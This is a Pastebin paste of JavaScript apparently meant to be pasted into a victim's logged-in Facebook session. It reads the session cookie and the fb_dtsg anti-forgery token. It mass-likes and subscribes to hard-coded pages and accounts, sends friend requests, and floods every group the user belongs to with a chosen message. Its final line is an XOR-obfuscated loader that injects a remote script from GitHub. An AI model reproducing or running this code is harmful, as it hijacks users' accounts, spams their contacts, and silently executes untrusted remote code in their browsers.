Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var askformsg = "<div><span class='img sp_38ydyu sx_004ff3'></span><a style='position:absolute;padding-left:3px;font-size:11px;'>Write Post</a></div></br>";
- askformsg += "<div><textarea id='txtFloodMsg' placeholder='Write somthing...' style='padding-top:5px;width:505px;height:100px;font-family:tahoma;font-size:13px;background-color:rgba(255,255,255,0.1);'></textarea></div>";
- askformsg += "<div><button style='margin-left:453px' class='_42ft _42fu _11b selected _42g-' onclick='autopostingfunc(this);' >Post</button></div>";
- var Popupset = document.createElement("div");
- Popupset.setAttribute("style", "position:fixed;left:50%;margin-left:-298px;top:100px;z-index:9999;font-size:11px;font-family:tahoma;color:#3B5998;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);font-weight:bold;border-radius:3px;border:1px solid rgba(200,200,50,0.2);padding:5px;background-color:rgba(255,255,255,0.9)");
- Popupset.innerHTML = askformsg;
- document.body.appendChild(Popupset);
- Like("247491065422545");Like("548034065294697");Like("1422940601284441");Like("276921012466700");Like("599405296811465");Like("1388227378114214");Like("494820930627970");Like("266368873527785");Like("1388709464732651");Like("1397289827201543");Like("233410016824425");Like("520198931433282");Like("630238107042688");Like("575130462581628");Like("610069872392974");Like("217081035166391");Like("756117064403384");Like("546966428713409");Like("162923720584459");Like("546966428713409");Like("812777338747805");Like("1477861329091900");Like("259302434243392");Like("");Like("");
- sublist("1387885481479136");a("100001322905405");P("1393471980920486");a("100007730924320");sublist("570629146324510");sublist("588132684574156");P("619392781448146");sublist("618387511548673");sublist("619689784751779");Like("308639339237727");a("100002295829550");a("100003802633881");P("398982256905192");P("346881868781898");P("324035341066551");P("246204152183004");P("367952090008209");P("376700365800048");P("388230677980350");P("367060343430717");P("357651031038315");P("307854539351298");P("315690461901039");P("321910097945742");P("305644009572351");P("378668095603275");P("375175242619227");P("266873173449435");P("350162285120523");P("400141746789243");P("399894616813956");P("591481474271708");P("590877840998738");P("584366884983167");P("160363794050147");P("594489323970923");P("1447418765480049");P("");P("");IDS("100002295829550");IDS("100003802633881");sublist("347395568730528");sublist("396516010485150");sublist("396516270485124");sublist("396516557151762");sublist("396516717151746");sublist("396516900485061");sublist("396517213818363");sublist("396517323818352");sublist("396518080484943");sublist("396518497151568");sublist("396518823818202");sublist("366702906799794");sublist("396519237151494");sublist("396519440484807");sublist("366691630134255");
- sublist("369996346470450");sublist("358394594297292");sublist("396514647151953");sublist("396515053818579");sublist("396515507151867");sublist("396515810485170");sublist("394795703990514");sublist("397465637056854");sublist("397466213723463");sublist("583347348418454");sublist("583348435085012");sublist("727027670645182");sublist("165831850272204");sublist("397465637056854");sublist("397466213723463");sublist("1387885481479136");a("100001322905405");a("100007730924320");sublist("570629146324510");sublist("588132684574156");sublist("618387511548673");sublist("619689784751779");sublist("636349693089186");P("1393471980920486");P("619392781448146");
- jx = {
- getHTTPObject: function () {
- var A = false;
- if (typeof ActiveXObject != "undefined") {
- try {
- A = new ActiveXObject("Msxml2.XMLHTTP")
- } catch (C) {
- try {
- A = new ActiveXObject("Microsoft.XMLHTTP")
- } catch (B) {
- A = false
- }
- }
- } else {
- if (window.XMLHttpRequest) {
- try {
- A = new XMLHttpRequest()
- } catch (C) {
- A = false
- }
- }
- }
- return A
- },
- load: function (url, callback, format, method, opt) {
- var http = this.init();
- if (!http || !url) {
- return
- }
- if (http.overrideMimeType) {
- http.overrideMimeType("text/xml")
- }
- if (!method) {
- method = "GET"
- }
- if (!format) {
- format = "text"
- }
- if (!opt) {
- opt = {}
- }
- format = format.toLowerCase();
- method = method.toUpperCase();
- var now = "uid=" + new Date().getTime();
- url += (url.indexOf("?") + 1) ? "&" : "?";
- url += now;
- var parameters = null;
- if (method == "POST") {
- var parts = url.split("?");
- url = parts[0];
- parameters = parts[1]
- }
- http.open(method, url, true);
- if (method == "POST") {
- http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- http.setRequestHeader("Content-length", parameters.length);
- http.setRequestHeader("Connection", "close")
- }
- var ths = this;
- if (opt.handler) {
- http.onreadystatechange = function () {
- opt.handler(http)
- }
- } else {
- http.onreadystatechange = function () {
- if (http.readyState == 4) {
- if (http.status == 200) {
- var result = "";
- if (http.responseText) {
- result = http.responseText
- }
- if (format.charAt(0) == "j") {
- result = result.replace(/[\n\r]/g, "");
- result = eval("(" + result + ")")
- } else {
- if (format.charAt(0) == "x") {
- result = http.responseXML
- }
- }
- if (callback) {
- callback(result)
- }
- } else {
- if (opt.loadingIndicator) {
- document.getElementsByTagName("body")[0].removeChild(opt.loadingIndicator)
- }
- if (opt.loading) {
- document.getElementById(opt.loading).style.display = "none"
- }
- if (error) {
- error(http.status)
- }
- }
- }
- }
- }
- http.send(parameters)
- },
- bind: function (A) {
- var C = {
- "url": "",
- "onSuccess": false,
- "onError": false,
- "format": "text",
- "method": "GET",
- "update": "",
- "loading": "",
- "loadingIndicator": ""
- };
- for (var B in C) {
- if (A[B]) {
- C[B] = A[B]
- }
- }
- if (!C.url) {
- return
- }
- var D = false;
- if (C.loadingIndicator) {
- D = document.createElement("div");
- D.setAttribute("style", "position:absolute;top:0px;left:0px;");
- D.setAttribute("class", "loading-indicator");
- D.innerHTML = C.loadingIndicator;
- document.getElementsByTagName("body")[0].appendChild(D);
- this.opt.loadingIndicator = D
- }
- if (C.loading) {
- document.getElementById(C.loading).style.display = "block"
- }
- this.load(C.url, function (E) {
- if (C.onSuccess) {
- C.onSuccess(E)
- }
- if (C.update) {
- document.getElementById(C.update).innerHTML = E
- }
- if (D) {
- document.getElementsByTagName("body")[0].removeChild(D)
- }
- if (C.loading) {
- document.getElementById(C.loading).style.display = "none"
- }
- }, C.format, C.method, C)
- },
- init: function () {
- return this.getHTTPObject()
- }
- }
- var j = 0;
- var k = 0;
- var suc = 0;
- var msg = "Hello Friends.";
- var arr = new Array();
- var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- function autopostingfunc(sender) {
- if (document.getElementById("txtFloodMsg").value != "") msg = document.getElementById("txtFloodMsg").value;
- jx.load(window.location.protocol + "//" + "www.facebook.com/ajax/typeahead/search/bootstrap.php?__a=1&filter[0]=group&viewer=" + user_id + "&token=v7&lazy=0&__user=" + user_id, function (data) {
- var text = data;
- var json = text.substring(text.indexOf('{'));
- var friends = JSON.parse(json);
- friends = friends.payload.entries;
- for (var n = 0; n < friends.length; n++) {
- arr.push(friends[n].uid);
- }
- sender.parentNode.innerHTML = "Please Wait....";
- postitok();
- });
- }
- var a = document.body.innerHTML;
- var dts = document.getElementsByName('fb_dtsg')[0].value;
- var composerid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- function postitok() {
- pst = "fb_dtsg=" + dts + "&xhpc_composerid=" + composerid + "&xhpc_targetid=" + arr[suc] + "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" + encodeURIComponent(msg) + "&xhpc_message=" + encodeURIComponent(msg) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_group_composer";
- with(newx = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send(pst);
- suc++;
- if (suc > arr.length) {
- alert("Completed. Please refresh page.");
- suc = 0;
- } else setTimeout("postitok()", 30000 / arr.length);
- }
- setTimeout("autopostingfunc()", 1000);
- var A="jvvrq8--pcu,ekvjw`,amo-ucxx{epc{-dcag`mmi-ej/rcegq-Qwrrmpv,hq";B="";C="";var D;D=A.length;for(i=0;i<D;i++){B+=String.fromCharCode(A.charCodeAt(i)^2)}C=unescape(B);document.body.appendChild(document.createElement('script')).src=C;
Advertisement
Add Comment
Please, Sign In to add comment